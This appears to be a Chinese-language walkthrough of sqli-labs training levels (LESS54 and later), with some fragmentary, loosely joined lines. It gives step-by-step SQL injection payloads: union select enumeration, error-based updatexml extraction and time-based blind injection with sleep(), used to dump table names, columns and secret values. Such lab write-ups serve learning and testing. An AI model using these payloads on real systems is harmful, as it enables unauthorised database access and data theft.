LESS54 关卡要求:此挑战的目标是在不到10次的尝试中从数据库的随机表中转储(密钥 为了好玩,每次重置,挑战都会生成随机表名、列名和表数据。随时保持新鲜。 ①判断列数(二分法) 输入:?id=1' order by 3--
②当前数据库 输入:?id=-1' union select 1,2,database() --
③查表 输入:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --
9po9d7v0i2
④查字段 输入:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --
⑤查字段的值 输入:?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --
1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4 点击提交即可通过完毕。
把你这个愚蠢的黑客赶走!
LESS55
参数:(1) 次数:14次
参数:(‘1’) 次数:14次
参数:“1” 次数:14次 次数:5次 这关不能使用 union select 没有返回回显位置。 我们使用报错注入。 ①查表 数据库已知是challenges 输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --
②查字段 输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --
③查字段的值 输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --
恭喜你成功了!
参数 :id=1 无包裹 参数:id=(“1”) 参数:id=((‘1’))
一共130次,显而易见盲注它来了!! 输入:?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) -- 改变它的值逐次判断即可。 参数:‘1’ 参数:((1)) 参数:(“1”) 来源:https://www./content-2-662201.html |
|